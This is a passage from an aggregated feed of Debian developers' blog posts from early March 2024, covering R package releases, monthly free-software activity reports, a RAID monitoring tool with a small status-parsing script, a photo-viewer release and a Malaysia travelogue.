version 0.0.2 (2024-03-04)</h4>
<ul>
<li><p>Added continuous integration action based on r2u</p></li>
<li><p>Added <code>demo/</code> directory and a README.md</p></li>
<li><p>Minor edits to help page content</p></li>
<li><p>Synchronised with <span class="pkg">ggplot2</span> 3.5.0 via
<span class="pkg">hrbrthemes</span></p></li>
</ul>
</blockquote>
<p>Courtesy of my <a href="https://dirk.eddelbuettel.com/cranberries/">CRANberries</a>, there
is a <a href="https://dirk.eddelbuettel.com/cranberries/2024/03/04/#tinythemes_0.0.2">diffstat
report</a> relative to previous release. More detailed information is on
the <a href="https://github.com/eddelbuettel/tinythemes">repo</a> where
comments and suggestions are welcome.</p>
<p>If you like this or other open-source work I do, you can <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>2024-03-04T22:58:00+00:00Dirk EddelbuettelColin Watson: Free software activity in January/February 2024
https://www.chiark.greenend.org.uk/~cjwatson/blog/activity-2024-02.html
<p>Two months into my <a href="https://www.chiark.greenend.org.uk/~cjwatson/blog/going-freelance.html">new gig</a> and it’s going
great! <a href="https://www.chiark.greenend.org.uk/~cjwatson/blog/task-management.html">Tracking my time</a> has taken a bit of
getting used to, but having something that amounts to a queryable database
of everything I’ve done has also allowed some helpful introspection.</p>
<p>Freexian <a href="https://www.freexian.com/about/debian-contributions/">sponsors</a> up
to 20% of my time on Debian tasks of my choice. In fact I’ve been spending
the bulk of my time on
<a href="https://freexian-team.pages.debian.net/debusine/">debusine</a> which is itself
intended to accelerate work on Debian, but more details on that later.
While I contribute to Freexian’s
<a href="https://www.freexian.com/tags/debian-contributions/">summaries</a> now, I’ve
also decided to start writing monthly posts about my free software activity
as many others do, to get into some more detail.</p>
<h2>January 2024</h2>
<ul>
<li>I <a href="https://salsa.debian.org/ci-team/autopkgtest/-/merge_requests/272">added Incus
support</a>
to autopkgtest. <a href="https://linuxcontainers.org/incus/">Incus</a> is a system
container and virtual machine manager, forked from <a href="https://github.com/canonical/lxd">Canonical’s
<span class="caps">LXD</span></a>. I switched my laptop over to it
and then quickly found that it was inconvenient not to be able to run
Debian package test suites using
<a href="https://manpages.debian.org/man/autopkgtest">autopkgtest</a>, so I tweaked
autopkgtest’s existing <span class="caps">LXD</span> integration to support using either <span class="caps">LXD</span> or Incus.</li>
<li>I discovered <a href="https://metacpan.org/dist/Perl-Critic">Perl::Critic</a> and
used it to tidy up some poor practices in several of my packages,
including debconf. Perl used to be my language of choice but I’ve been
mostly using Python for over a decade now, so I’m not as fluent as I used
to be and some mechanical assistance with spotting common errors is
helpful; besides, I’m generally a big fan of applying static analysis to
everything possible in the hope of reducing bug density. Of course, this
did result in a couple of regressions
(<a href="https://salsa.debian.org/pkg-debconf/debconf/-/commit/4f8b9f969679fa4a38aca8da2702057ea861ffae">1</a>,
<a href="https://salsa.debian.org/pkg-debconf/debconf/-/commit/7274bf66e82b2557156813f93ed0592539a2ac1c">2</a>),
but at least we caught them fairly quickly.</li>
<li>I did some overdue debconf maintenance, mainly around tidying up error
message handling in several places (<a href="https://bugs.debian.org/797071">1</a>,
<a href="https://bugs.debian.org/754123">2</a>,
<a href="https://bugs.debian.org/682508">3</a>).</li>
<li>I did some routine maintenance to move several of my upstream projects to
a new <a href="https://www.gnu.org/software/gnulib/manual/html_node/Stable-Branches.html">Gnulib stable
branch</a>.</li>
<li><a href="https://salsa.debian.org/debian/debmirror">debmirror</a> includes a <a href="https://salsa.debian.org/debian/debmirror/-/blob/master/mirror_size">useful
summary</a>
of how big a Debian mirror is, but it hadn’t been updated since 2010 and
the script to do so had bitrotted quite badly. I <a href="https://salsa.debian.org/debian/debmirror/-/commit/7ae93742377d9205c57b7e47ef96d4663110f0ff">fixed
that</a>
and added a recurring task for myself to refresh this every six months.</li>
</ul>
<h2>February 2024</h2>
<ul>
<li>Some time back I added AppArmor and seccomp confinement to man-db. This
was mainly motivated by a desire to <a href="https://forum.snapcraft.io/t/support-for-man-pages/2299/24">support manual pages in
snaps</a> (which
is <a href="https://bugs.launchpad.net/snapd/+bug/1575593">still open</a> several
years later …), but since reading manual pages involves a <a href="https://www.gnu.org/software/groff/">non-trivial
text processing toolchain mostly written in
C++</a>, I thought it was reasonable to
assume that some day it might have a vulnerability even though its track
record has been good; so <code>man</code> now restricts the system calls that
<code>groff</code> can execute and the parts of the file system that it can access.
I stand by this, but it did cause some problems that have needed a
succession of small fixes over the years. This month I issued
<a href="https://lists.debian.org/debian-lts-announce/2024/02/msg00001.html"><span class="caps">DLA</span>-3731-1</a>,
backporting some of those fixes to buster.</li>
<li>I spent some time chasing a <a href="https://bugs.debian.org/1063413">console-setup build
failure</a> following the removal of
kFreeBSD support, which was uploaded by mistake. I suggested a <a href="https://salsa.debian.org/holgerw/console-setup/-/merge_requests/1">set of
fixes</a>
for this, but the author of the change to remove kFreeBSD support decided
to take a different approach (fair enough), so I’ve abandoned this.</li>
<li>I updated the <a href="https://tracker.debian.org/pkg/zope.testrunner">Debian zope.testrunner
package</a> to 6.3.1.</li>
<li>openssh:<ul>
<li>A Freexian collaborator had a problem with automating installations
involving changes to <code>/etc/ssh/sshd_config</code>. This turned out to be
resolvable without any changes, but in the process of investigating I
noticed that my dodgy arrangements to avoid
<a href="https://manpages.debian.org/man/ucf">ucf</a> prompts in certain cases
had bitrotted slightly, which meant that some people might be prompted
unnecessarily. I <a href="https://salsa.debian.org/ssh-team/openssh/-/commit/b9671cc74475922fa61e9ebdba56ec84446d19ac">fixed this and arranged for it not to happen
again</a>.</li>
<li>Following a <a href="https://lists.debian.org/debian-devel/2024/02/msg00239.html">recent debian-devel
discussion</a>,
I realized that some particularly awkward code in the OpenSSH
packaging was now obsolete, and <a href="https://salsa.debian.org/ssh-team/openssh/-/commit/a6c7b9ef532489671e3a654ad38102cc30d94b5a">removed
it</a>.</li>
</ul>
</li>
<li>I backported a <a href="https://bugs.debian.org/1027387">python-channels-redis
fix</a> to bookworm. I wasn’t the first
person to run into this, but I rediscovered it while working on debusine
and it was confusing enough that it seemed worth fixing in stable.</li>
<li>I fixed a <a href="https://bugs.debian.org/1064699">simple build failure in
storm</a>.</li>
<li>I dug into a very confusing cluster of celery build failures
(<a href="https://bugs.debian.org/1056232">1</a>,
<a href="https://bugs.debian.org/1058317">2</a>,
<a href="https://bugs.debian.org/1063345">3</a>), and tracked the hardest bit down
to a <a href="https://github.com/python/cpython/issues/115874">Python 3.12
regression</a>, now fixed
in unstable thanks to Stefano Rivera. Getting celery back into testing
is blocked on the <a href="https://wiki.debian.org/ReleaseGoals/64bit-time">64-bit <code>time_t</code>
transition</a> for now, but
once that’s out of the way it should flow smoothly again.</li>
</ul>2024-03-04T10:39:50+00:00Colin WatsonIustin Pop: New corydalis 2024.9.0 release!
https://k1024.org/posts/2024/2024-03-03-new-corydalis-release/
<p>Obligatory and misused quote: <em>It’s not dead, Jim!</em></p>
<p>I’ve kind of dropped the ball lately on organising my own photo
collection, but February was a pretty good month and I managed to
write some more code for
<a href="https://github.com/iustin/corydalis">Corydalis</a>, ending up with the
aforementioned <a href="https://github.com/iustin/corydalis/releases/tag/v2024.9.0">new
release</a>.</p>
<p>The release is not a big one, but I did manage to solve one thing that
was annoying me <em>greatly</em>: the inability to play videos inline
in one of the two picture viewing modes (in my preferred mode, in
fact). Now, whether you’re browsing through pictures, or looking at
pictures one-by-one, you can in both cases play videos easily, and to
some extent, “as it should be”. No user docs for that yet (I actually
need to split the manual into user/admin/developer parts).</p>
<p>I did some more internal cleanups, and I’ve enabled building release
zips (since that’s how GitHub actions creates artifacts), which means
it should be 10% easier to test this. The remaining 90% is configuring it
and pointing to picture folders and and and, so this is definitely not
plug-and-play.</p>
<p>The diff summary between <code>2023.44.0</code> and <code>2024.9.0</code> is: 56 files
changed, 1412 insertions(+), 700 deletions(-). Which is not bad, but
also not too much. The biggest churn was, as expected, in the viewer
(due to the aforementioned video playing). The “scary” part is that
the TypeScript code is now at 7.9% (plus a tiny bit more JS, which I can’t
convert yet due to lack of type definitions upstream). I say scary in
quotes, because I would actually like to know Typescript better, but
no time.</p>
<p>The new release can be seen in action on
<a href="https://demo.corydalis.io">demo.corydalis.io</a>, and as always, just
after release I found two minor issues:</p>
<ul>
<li>The GitHub actions don’t retrieve the tags <a href="https://github.com/actions/checkout/issues/701">by
default</a>, actually
they didn’t use to retrieve tags at all, but that’s fixed now, just
needs configuration, so the public build just says “<em>Corydalis
fbe0088, built on Mar 3 2024.</em>” (which is the correct hash value, at
least).</li>
<li>I don’t have videos on the public web site, so the new functionality
is not visible. I’m not sure I want to add real videos
(size/bandwidth), hmm 🤨.</li>
</ul>
<p>Well, there will be future releases. For now, I’ve made an open-source
package release, which I didn’t do in a while, so I’m happy 😁. See
you!</p>2024-03-03T22:15:00+00:00Iustin PopPetter Reinholdtsen: RAID status from LSI Megaraid controllers using free software
https://people.skolelinux.org/pere/blog/RAID_status_from_LSI_Megaraid_controllers_using_free_software.html
<p>The last few days I have revisited RAID setup using the LSI
Megaraid controller. These are a family of controllers that Dell calls
PERC, present in several older PowerEdge servers, and I recently
got my hands on one of these. I had forgotten how to handle this RAID
controller in Debian, so I had to take a peek in the
<a href="https://wiki.debian.org/LinuxRaidForAdmins">Debian wiki page
"Linux and Hardware RAID: an administrator's summary"</a> to remember
what kind of software is available to configure and monitor the disks
and controller. I prefer Free Software alternatives to proprietary
tools, as the latter tend to fall into disarray once the manufacturer
loses interest, and often do not work with newer Linux distributions.
Sadly there is no free software tool to configure the RAID setup, only
to monitor it. RAID can provide improved reliability and resilience in
a storage solution, but only if it is being regularly checked and any
broken disks are being replaced in time. I thus want to ensure some
automatic monitoring is available.</p>
<p>In the discovery process, I came across an old free software tool to
monitor PERC2, PERC3, PERC4 and PERC5 controllers, which to my
surprise is not present in Debian. To help change that I created a
<a href="https://bugs.debian.org/1065322">request for packaging of the
megactl package</a>, and tried to track down a usable version.
<a href="https://sourceforge.net/p/megactl/">The original project
site</a> is on Sourceforge, but as far as I can tell that project has
been dead for more than 15 years. I managed to find a
<a href="https://github.com/hmage/megactl">more recent fork on
github</a> from user hmage, but it is unclear to me if this is still
being maintained. It has not seen much improvements since 2016. A
<a href="https://github.com/namiltd/megactl">more up to date
edition</a> is a git fork from the original github fork by user
namiltd, and this newer fork seem a lot more promising. The owner of
this github repository has replied to change proposals within hours,
and had already added some improvements and support for more hardware.
Sadly he is reluctant to commit to maintaining the tool and stated in
<a href="https://github.com/namiltd/megactl/pull/1">my first pull
request</a> that he thinks a new release should be made based on the
git repository owned by hmage. I perfectly understand this
reluctance, as I feel the same about maintaining yet another package
in Debian when I barely have time to take care of the ones I already
maintain, but do not really have high hopes that hmage will have time
to spend on it and hope namiltd will change his mind.</p>
<p>In any case, I created
<a href="https://salsa.debian.org/debian/megactl">a draft package</a>
based on the namiltd edition and put it under the debian group on
salsa.debian.org. If you own a Dell PowerEdge server with one of the
PERC controllers, or any other RAID controller using the megaraid or
megaraid_sas Linux kernel modules, you might want to check it out. If
enough people are interested, perhaps the package will make it into
the Debian archive.</p>
<p>There are two tools provided, megactl for the megaraid Linux kernel
module, and megasasctl for the megaraid_sas Linux kernel module. The
simple output from the command on one of my machines looks like this
(yes, I know some of the disks have problems :).</p>
<pre># megasasctl
a0 PERC H730 Mini encl:1 ldrv:2 batt:good
a0d0 558GiB RAID 1 1x2 optimal
a0d1 3067GiB RAID 0 1x11 optimal
a0e32s0 558GiB a0d0 online errs: media:0 other:19
a0e32s1 279GiB a0d1 online
a0e32s2 279GiB a0d1 online
a0e32s3 279GiB a0d1 online
a0e32s4 279GiB a0d1 online
a0e32s5 279GiB a0d1 online
a0e32s6 279GiB a0d1 online
a0e32s8 558GiB a0d0 online errs: media:0 other:17
a0e32s9 279GiB a0d1 online
a0e32s10 279GiB a0d1 online
a0e32s11 279GiB a0d1 online
a0e32s12 279GiB a0d1 online
a0e32s13 279GiB a0d1 online
#
</pre>
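<p>Output like the above lends itself to automated checks. Here is a hypothetical Python sketch that flags drives reporting errors or a non-online state; the field layout and the <code>suspicious_drives</code> helper are inferred purely from the sample output above, not from any megasasctl documentation:</p>

```python
# Hypothetical parser for megasasctl-style status output, flagging
# physical drives that are not "online" or report any error counters.
# Field layout is inferred from the sample report shown above.
SAMPLE = """\
a0e32s0    558GiB  a0d0  online   errs: media:0  other:19
a0e32s1    279GiB  a0d1  online
a0e32s8    558GiB  a0d0  online   errs: media:0  other:17
"""

def suspicious_drives(report):
    """Return IDs of drives that are offline or show non-zero errors."""
    bad = []
    for line in report.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[0].startswith("a0e"):
            continue  # not a physical-drive line
        drive, state = fields[0], fields[3]
        has_errors = "errs:" in line and not line.endswith("other:0")
        if state != "online" or has_errors:
            bad.append(drive)
    return bad

print(suspicious_drives(SAMPLE))  # the two drives with "other" errors
```

A cron job wrapping something like this around the real tool could mail a warning when the list is non-empty, which is exactly the kind of regular checking the paragraph above argues for.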
<p>In addition to displaying a simple status report, it can also test
individual drives and print the various event logs. Perhaps you too
find it useful?</p>
<p>In the packaging process I provided some patches upstream to
improve installation and to ensure an AppStream
metainfo file is provided listing all supported hardware, to allow
<a href="https://tracker.debian.org/isenkram">isenkram</a> to propose
the package on all servers with a relevant PCI card.</p>
<p>As usual, if you use Bitcoin and want to show your support of my
activities, please send Bitcoin donations to my address
<b><a>15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b</a></b>.</p>2024-03-03T21:40:00+00:00Petter ReinholdtsenDirk Eddelbuettel: RcppArmadillo 0.12.8.1.0 on CRAN: Upstream Fix, Interface Polish
http://dirk.eddelbuettel.com/blog/2024/03/03#rcpparmadillo_0.12.8.1.0
<p><img alt="armadillo image" src="http://dirk.eddelbuettel.com/images/armadillo_logo_two.png" style="float: left; margin: 10px 10px 10px 0;" /></p>
<p><a href="https://arma.sourceforge.net/">Armadillo</a> is a powerful
and expressive C++ template library for linear algebra and scientific
computing. It aims towards a good balance between speed and ease of use,
has a syntax deliberately close to Matlab, and is useful for algorithm
development directly in C++, or quick conversion of research code into
production environments. <a href="https://dirk.eddelbuettel.com/code/rcpp.armadillo.html">RcppArmadillo</a>
integrates this library with the <a href="https://www.r-project.org">R</a> environment and language–and is
widely used by (currently) 1130 other packages on <a href="https://cran.r-project.org">CRAN</a>, downloaded 32.8 million
times (per the partial logs from the cloud mirrors of CRAN), and the <a href="https://doi.org/10.1016/j.csda.2013.02.005">CSDA paper</a> (<a href="https://cran.r-project.org/package=RcppArmadillo/vignettes/RcppArmadillo-intro.pdf">preprint
/ vignette</a>) by Conrad and myself has been cited 578 times according
to Google Scholar.</p>
<p>This release brings a new upstream bugfix release Armadillo 12.8.1
prepared by <a href="https://conradsanderson.id.au/">Conrad</a>
yesterday. It was delayed for a few hours as <a href="https://cran.r-project.org">CRAN</a> noticed an error in one
package which we all concluded was spurious as it could be reproduced
outside of the one run there. Following from the previous release, we
also use the slightly faster ‘Lighter’ header in the examples. And once
it got to <a href="https://cran.r-project.org">CRAN</a> I also updated
the <a href="https://www.debian.org">Debian</a> package.</p>
<p>The set of changes since the last <a href="https://cran.r-project.org">CRAN</a> release follows.</p>
<blockquote>
<h4 id="changes-in-rcpparmadillo-version-0.12.8.1.0-2024-03-02">Changes
in RcppArmadillo version 0.12.8.1.0 (2024-03-02)</h4>
<ul>
<li><p>Upgraded to Armadillo release 12.8.1 (Cortisol Injector)</p>
<ul>
<li>Workaround in <code>norm()</code> for yet another bug in macOS
accelerate framework</li>
</ul></li>
<li><p>Update README for RcppArmadillo usage counts</p></li>
<li><p>Update examples to use '#include <RcppArmadillo/Lighter>'
for faster compilation excluding unused Rcpp features</p></li>
</ul>
</blockquote>
<p>Courtesy of my <a href="https://dirk.eddelbuettel.com/cranberries/">CRANberries</a>, there
is a <a href="https://dirk.eddelbuettel.com/cranberries/2024/03/03/#RcppArmadillo_0.12.8.1.0">diffstat
report</a> relative to previous release. More detailed information is on
the <a href="https://dirk.eddelbuettel.com/code/rcpp.armadillo.html">RcppArmadillo
page</a>. Questions, comments etc should go to the <a href="https://lists.r-forge.r-project.org/cgi-bin/mailman/listinfo/rcpp-devel">rcpp-devel
mailing list</a> off the <a href="https://r-forge.r-project.org/projects/rcpp/">Rcpp R-Forge</a>
page.</p>
<p>If you like this or other open-source work I do, you can <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>2024-03-03T21:14:00+00:00Dirk EddelbuettelBen Hutchings: FOSS activity in February 2024
https://www.decadent.org.uk/ben/blog/2024/03/03/foss-activity-in-february-2024.html
<ul>
<li>I updated the Linux kernel packages in various Debian suites:
<ul>
<li>buster: Updated linux-5.10 to the latest security update for
bullseye, and uploaded it, but it still needs to be approved.</li>
<li>bullseye-backports: Updated linux (6.1) to the latest security
update from bullseye, and uploaded it.</li>
<li>bookworm-backports: Updated linux to the current version in
testing, and uploaded it.</li>
</ul>
</li>
<li>I reported a <a href="https://bugs.debian.org/1064035">regression in documentation
builds</a> in the Linux 5.10 stable
branch.</li>
</ul>2024-03-03T19:28:18+00:00Ben HutchingsPaul Wise: FLOSS Activities Feb 2024
http://bonedaddy.net/pabs3/log/2024/03/03/floss-activities/
<h1 id="focus">Focus</h1>
<p>This month I didn't have any particular focus.
I just worked on issues in my info bubble.</p>
<h1 id="changes">Changes</h1>
<ul>
<li>check-all-the-things:
<a href="https://github.com/collab-qa/check-all-the-things/commit/d39bd1e7458fddce06948626d3c68df9bde990bf">update dep</a></li>
<li>Debian reportbug:
<a href="https://salsa.debian.org/reportbug-team/reportbug/-/merge_requests/91">allow defaults for multi-select menus</a></li>
<li>Debian release website:
<a href="https://salsa.debian.org/release-team/release.debian.org/-/merge_requests/23">link arch policy from arch qualification</a></li>
<li>Debian BTS usertags:
fix porter, reproducible, release tags</li>
<li>Debian wiki pages:
<a href="https://wiki.debian.org/attachement%3Aroot-system-build.sh?action=diff&rev1=1&rev2=2">attachement:root-system-build.sh</a>,
<a href="https://wiki.debian.org/attachement%3Aroot-system-changes.sh?action=diff&rev1=1&rev2=2">attachement:root-system-changes.sh</a>,
<a href="https://wiki.debian.org/DebianScience/ROOT?action=diff&rev1=66&rev2=67">DebianScience/ROOT</a>,
<a href="https://wiki.debian.org/Games/GameDataPackager?action=diff&rev1=28&rev2=29">Games/GameDataPackager</a>,
<a href="https://wiki.debian.org/PortsDocs/New?action=diff&rev1=111&rev2=112">PortsDocs/New</a></li>
</ul>
<h1 id="issues">Issues</h1>
<ul>
<li>Crashes in
<a href="https://bugs.debian.org/1063825">ognibuild</a></li>
<li>Warnings in
<a href="https://bugs.debian.org/1063826">python3-binwalk</a>,
<a href="https://bugs.debian.org/1063330">python3-extruct</a>,
<a href="https://bugs.debian.org/1064209">offpunk</a></li>
<li>Conversion missed in
<a href="https://bugs.debian.org/1064341">colorized-logs</a></li>
<li>Features in
<a href="https://bugs.debian.org/1063650">reportbug</a>,
<a href="https://gitlab.softwareheritage.org/swh/devel/swh-web/-/issues/4790">swh-web</a></li>
<li>Conffile removal needed in
<a href="https://bugs.debian.org/1064877">fwupd</a></li>
<li>Expired cert in
<a href="https://bugs.debian.org/1063093">ca-certificates</a></li>
</ul>
<h1 id="review">Review</h1>
<ul>
<li>Spam: reported
1 Debian bug report</li>
<li>Debian BTS usertags:
changes for the month</li>
</ul>
<h1 id="administration">Administration</h1>
<ul>
<li>Debian BTS:
unarchive/reopen/triage bugs for reintroduced packages:
ovito,
tahoe-lafs,
tpm2-tss-engine</li>
<li>Debian wiki:
produce HTML dump for a user,
unblock IP addresses,
approve accounts</li>
</ul>
<h1 id="communication">Communication</h1>
<ul>
<li>Respond to queries from Debian users and contributors on the mailing lists and IRC</li>
</ul>
<h1 id="sponsors">Sponsors</h1>
<p>The SWH work was sponsored.
All other work was done on a volunteer basis.</p>2024-03-03T07:52:36+00:00Paul WiseRavi Dwivedi: Malaysia Trip
https://ravidwivedi.in/posts/malaysia-trip/
<p>Last month, I took a trip to Malaysia and Thailand, staying for six days in each country. I chose these countries because both were granting <a href="https://www.thehindu.com/news/national/malaysia-joins-thailand-and-sri-lanka-in-granting-visa-free-entry-for-indians/article67579107.ece">visa-free entry</a> to Indian tourists for a limited time window. This post covers the Malaysia part; the Thailand part will be covered in the next post. If you want to travel to either country in the visa-free period, I have written down all the questions asked during immigration and at airports during this trip <a href="https://cryptpad.fr/pad/#/2/pad/view/kTHYSSxU8DzTSdetdrgdebcVDsjTAlThSbC52QcZgx8/">here</a>, which might be of help.</p>
<p>I mostly stayed in Kuala Lumpur and went to places around it. Before the trip, I had planned to visit Ipoh and the Cameron Highlands too, but could not cover them. I found planning a trip to Malaysia a little difficult. The country is divided into two main regions - Peninsular Malaysia and Malaysian Borneo. Then there are the smaller islands - Langkawi, Penang, and the Perhentian and Redang Islands. Reaching those islands seemed a little difficult to plan, and I wish to visit more places on my next Malaysia trip.</p>
<p>My first night's hostel was booked in the Chinatown area of Kuala Lumpur, near Pasar Seni LRT station. As soon as I checked in and entered my room, I met another Indian named Fletcher, and after that we accompanied each other on the trip. That day, we went to Muzium Negara and Little India. I realized that if you know the right places to buy what you want, Malaysia can be quite cheap. The Malaysian currency is the Malaysian Ringgit (MYR); 1 MYR is equal to about 18 INR. For 2 MYR you can get a good masala tea in Little India, and a masala dosa costs around 4-5 MYR. Vegetarian food is easy to find in Kuala Lumpur, thanks to the Tamil community. I also tried <a href="https://en.wikipedia.org/wiki/Mee_goreng">Mee Goreng</a>, which was vegetarian, and I found it fine in terms of taste. When I looked up Mee Goreng on Wikipedia, I found out that it originated among Indian immigrants in Malaysia (and neighboring countries) but you don’t get it in India!</p>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/mee-goreng.jpg" width="500" />
<h4>Mee Goreng, a dish made of noodles in Malaysia.</h4>
</figure>
<p>For the next day, Fletcher had planned a trip to Genting Highlands and pre-booked everything. I had planned to join him, but when we went to KL Sentral to take the bus, tickets for his bus were sold out. I could have taken a bus at a different time, but decided to visit some other place for the day and cover Genting Highlands later. At the ticket counter, I met a family from Delhi who also wanted to go to Genting Highlands; unable to get bus tickets for that day, they bought tickets for the next day and planned for Batu Caves instead. I joined them and went to Batu Caves.</p>
<p>After returning from Batu Caves, we went our separate ways. I went back and took rest at my hostel and later went to Petronas Towers at night. Petronas Towers is the icon of Kuala Lumpur. Having a photo there was a must. I was at Petronas Towers at around 9 PM. Around that time, Fletcher came back from Genting Highlands and we planned to meet at KL Sentral to head for dinner.</p>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/me-at-petronas-towers.jpg" width="400" />
<h4>Me at Petronas Towers.</h4>
</figure>
<p>We went back to the same place as the day before where I had Mee Goreng. This time we had dosa and a masala tea. Their masala tea from the last day was tasty and that’s why I was looking for them in the first place. We also met a Malaysian family having Indian ancestry dining there and had a nice conversation. Then we went to a place to eat roti canai in Pasar Seni market. Roti canai is a popular non-vegetarian dish in Malaysia but I took the vegetarian version.</p>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/photo-with-malaysians.jpg" width="500" />
<h4>Photo with Malaysians.</h4>
</figure>
<p>The next day, we went to the Berjaya Times Square shopping mall, which sells pretty cheap items for daily use and souvenirs too. However, I bought my souvenirs from Petaling Street, which is in Chinatown. At night, we explored Bukit Bintang, which is the heart of Kuala Lumpur and is famous for its nightlife.</p>
<p>After that, Fletcher went to Bangkok while I stayed in Malaysia for two more days. The next day, I went to Genting Highlands and took the cable car, which had awesome views. I came back to Kuala Lumpur by nightfall. On the remaining day, I just roamed around Bukit Bintang. Then I took a flight to Bangkok on 7th Feb, which I will cover in the next post.</p>
<p>In Malaysia, I met so many people from different countries - apart from people from Indian subcontinent, I met Syrians, Indonesians (Malaysia seems to be a popular destination for Indonesian tourists) and Burmese people. Meeting people from other cultures is an integral part of travel for me.</p>
<p>My expenses for Food + Accommodation + Travel added to 10,000 INR for a week in Malaysia, while flight costs were: 13,000 INR (Delhi to Kuala Lumpur) + 10,000 INR (Kuala Lumpur to Bangkok) + 12,000 INR (Bangkok to Delhi).</p>
<p>For OpenStreetMap users, the good news is that Kuala Lumpur is fairly well mapped on <a href="https://openstreetmap.org">OpenStreetMap</a>.</p>
<h2 id="tips">Tips</h2>
<ul>
<li>
<p>I bought a local SIM from a shop in the KL Sentral station complex with “news” in its name (I forget the exact name, and there are two shops there with “news” in their names); it was the cheapest option I could find. The SIM was 10 MYR for 5 GB of data for a week. If you want to make calls too, you need to spend an extra 5 MYR.</p>
</li>
<li>
<p>7-Eleven and KK Mart convenience stores are everywhere in the city and they are open all the time (24 hours a day). If you are a vegetarian, you can at least get some bread and cheese from there to eat.</p>
</li>
<li>
<p>A lot of people know English (and many - Indians, Pakistanis, Nepalis - know Hindi) in Kuala Lumpur, so I had no language problems most of the time.</p>
</li>
<li>
<p>For shopping on a budget, you can go to <a href="https://en.wikipedia.org/wiki/Petaling_Street">Petaling Street</a>, Berjaya Times Square or Bukit Bintang. In particular, there is a shop named I Love KL Gifts in Bukit Bintang, just near the metro/monorail station, which had very good prices. Check out the location of the shop on <a href="https://www.openstreetmap.org/#map=18/3.1463105/101.7110948">OpenStreetMap</a>.</p>
</li>
</ul>2024-03-02T13:59:59+00:00Ravi DwivediGuido Günther: Free Software Activities February 2024
https://honk.sigxcpu.org/con/Free_Software_Activities_February_2024.html
<p>A short status update on what happened last month. Work in progress is marked as WiP:</p>
<h2>GNOME Calls</h2>
<ul>
<li>Landed support for picking emergency call numbers based on location (until now Calls picked
the numbers from the SIM card only): <a href="https://gitlab.gnome.org/GNOME/calls/-/merge_requests/705">Merge Request</a></li>
<li>Bugfix: Fix dial back - the action mistakenly got disabled in some circumstances:
<a href="https://gitlab.gnome.org/GNOME/calls/-/merge_requests/719">Merge Request</a>, <a href="https://gitlab.gnome.org/GNOME/calls/-/issues/601">Issue</a>.</li>
</ul>
<h2>Phosh and Phoc</h2>
<p>As this often overlaps I've put them in a common section:</p>
<ul>
<li>Prepare and release <a href="https://phosh.mobi/releases/rel-0.36.0/">Phosh 0.36.0</a> and upload to Debian</li>
<li>phoc: Implement always-on-top and allow moving windows to corners via keybindings:
<a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/536">Merge Request</a>, <a href="https://social.librem.one/@agx/111936533547643050">Demo</a></li>
<li>phoc: Wire up support for fractional-scale-v1 protocol:
<a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/539">Merge Request</a>. <a href="https://gitlab.gnome.org/World/Phosh/phoc/-/issues/345">Issue</a></li>
<li>phoc: Go with the flow and don't use APIs that will be removed in wlroots 0.18, thus
switching to the render pass API: <a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/533">Merge Request</a></li>
<li>phoc (as part of my ongoing cleanups to make the code base more approachable):
<ul>
<li>Make PhocServer private: <a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/535">Merge Request</a></li>
<li>Move drag-icon handling into its own file: <a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/541">Merge Request</a></li>
</ul></li>
<li>phosh: load backgrounds asynchronously and handle dark theme URIs:
<a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1356">Merge Request</a></li>
<li>WiP: Allow using wallpapers on the lock screen and in the overview:
<a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/537">Merge Request 1</a>,
<a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1262">Merge Request 2</a>,
<a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1250">Merge Request 3</a></li>
<li>phosh: Add a caffeine quick-setting: <a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1373">Merge Request</a>, <a href="https://fosstodon.org/@phosh/111991537708416027">Demo</a></li>
<li>phosh and phoc bug fixes
<ul>
<li>Fix Maximized map of X11 surfaces: <a href="https://gitlab.gnome.org/World/Phosh/phoc/-/merge_requests/540">Merge Request</a></li>
<li>vpn fix: <a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1375">Merge Request</a></li>
<li>Fix crash around emergency calls: <a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1369">Merge Request</a></li>
<li>Honor disabled locking when there's no lock delay: <a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1371">Merge Request</a></li>
</ul></li>
<li>Testsuite improvements:
<ul>
<li>Speedup tests: <a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1365">Merge Request</a></li>
<li>Load plugins in tests: <a href="https://gitlab.gnome.org/World/Phosh/phosh/-/merge_requests/1374">Merge Request</a></li>
</ul></li>
<li>release <a href="https://gitlab.gnome.org/World/Phosh/gmobile/-/releases/v0.0.6">gmobile 0.0.6</a></li>
</ul>
<h2>Phosh Tour</h2>
<ul>
<li>Allow for hardware specific pages: <a href="https://gitlab.gnome.org/guidog/phosh-tour/-/merge_requests/22">Merge Request</a></li>
<li>Catch up with library and CI improvements: <a href="https://gitlab.gnome.org/World/Phosh/phosh-tour/-/merge_requests/21">Merge Request</a></li>
</ul>
<h2>Phosh Mobile Settings</h2>
<ul>
